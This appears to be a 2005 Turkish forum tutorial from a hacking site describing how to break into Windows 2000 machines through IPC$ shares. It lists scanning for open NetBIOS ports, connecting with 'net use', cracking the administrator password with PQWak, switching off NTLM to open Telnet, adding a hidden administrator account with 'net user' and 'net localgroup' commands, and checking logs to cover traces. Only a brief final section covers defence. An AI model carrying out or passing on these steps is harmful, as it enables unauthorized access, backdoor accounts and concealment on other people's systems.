Root > Documents > Web Güvenlik Açıkları > IPCS And Windows2000 Security
Cyber-Warrior.Org \ Doküman \ Web Güvenlik Açıkları > IPCS And Windows2000 Security
Madde
  Yazar : by_narco
  Date : 07.10.2005 17:44:06
 
# IPCS And Windows2000 Security
 
IPCS ile Windows2000 sistem hack
 
Gerekli olan Programlar
-Superscan <http://www.foundstone.com/knowledge/free_tools.html> V 3.00 (246KB)
-NetBrute Scanner <http://www.rawlogic.com/netbrute/> 1.0.0.7 (247KB)
-PQWak <http://www.astalavista.com/hacking/win/PQwak.exe> V1.0 (24KB)


1.Acik Win2k sistemi icin scanerlar sayesinde tarama yapma:
A)Superscan version 3.00 calistirin ( Port scan icin )
B)IP araligi secin
C)Scan sonucunda cikan acik portlari ve tüm portlari kontrol edin
D)Sadece scan port 139 (NETBIOS) ve 1025 (Network Blackjack) isinize yarayacak
E)Netbios ve BlackJack portlari bulunduktan sonra NetBrute calistirin ve istediginiz IP`yi taratin IPC$ görünüyor mu diye

2.IPC$`ye baglan:
A)DOS penceresi acin,
B)" net use \\\\\\ipaddress\ipc$ "" /user:administrator "
yazin,
C)Eger sisteme baglandiysaniz söyle bir yazi yaz cikacaktir pencerede " The command was completed successfully "
D)Eger suna benzer bir yazi yazarsa "bad username or password", sifreyi kirmak için PQWak.exe programini çalistirin.O zaman sifreyi su sekilde yazin: net use \\\\\\ipaddress\ipc$ "password" /user:administrator
E)Cogunlukla her yerde ayni sifreyi kullanir kullanicilar.IPC$ baglanmak için c$ ve administrator sifresini kullanin,

3.Bilgisayar yöneticisine baglan ve kullan:
A)Bilgisayar yöneticisini acin,
B)"Connect to Another Computer" dan "Action"`a tiklayin,
C)IP adresini yazin

4.NTLM`yi deaktive edin ( çalismasin ):
A)"regedit" açin,
B)Su registry key baglanin: HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0-->NTLM
C)"Value Data" Bilgileri (2) den (1) siralayin,
D)Bu IPC $ ile TelNet serverina baglanmanizi saglayacak,

5.TelNet`i çalistirin:
A)Bilgisayar yöneticisinden "Services and Applications" tiklayin,
B)Servise tiklayin,
C)TelNet de sag tusa tiklayin ve özellikleri acin,
D)Servisi otomatige ayarlayin ve baslatin,

6.Kullanici accountu olusturun ve group haline getirin:
A)Bir DOS penceresi acin ve açilan dos penceresinde sunu yazin: telnet IPaddress
B)Eger bir kullanici ismi ve sifre isterse, administrator yazin sifreyi de bos birakin,
C)Kullanici ismi olusturmak için sunu yazin:Net user username password /add
D)Kullanici ismini ve sifreyi istediginiz sekilde degistirin,
E)Kullanici accountunu domain`e eklemek için sunu yazin: Net localgroup administrators username /add Or Net group administrators username /add

7.izinizi gizleyin:
A)Bir DOS penceresi acin ve sunu yazin:Net use \\\\\\ipaddress\ipc$ /delete
B)Ayni anda bilgisayar yöneticisine giris yapin.Security Loglara göz atin, eger security Loglar temiz ise sorun yoktur 

8.Win2k`da sisteminizi nasil koruyacaksiniz?
A)Regedit acin,
B)Bir sonraki adimdakine baglanin,
C)HKEY_LOCAL_MACHINE--System--CurrentControlSet--Control--Lsa-->restrictanonymous
D)"Value Data" 0 dan 1 seklinde degistirin.Su sekilde bir sonuc verecektir "0x00000001(1)"
E)Bu loglari sifir IPC$ seklinde deaktive edecektir,
F)Her zaman degisik ve zor sifre kullanin Windows yada baska bir sistem icin,
G)Firewall kullanin
 
 
   
   
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©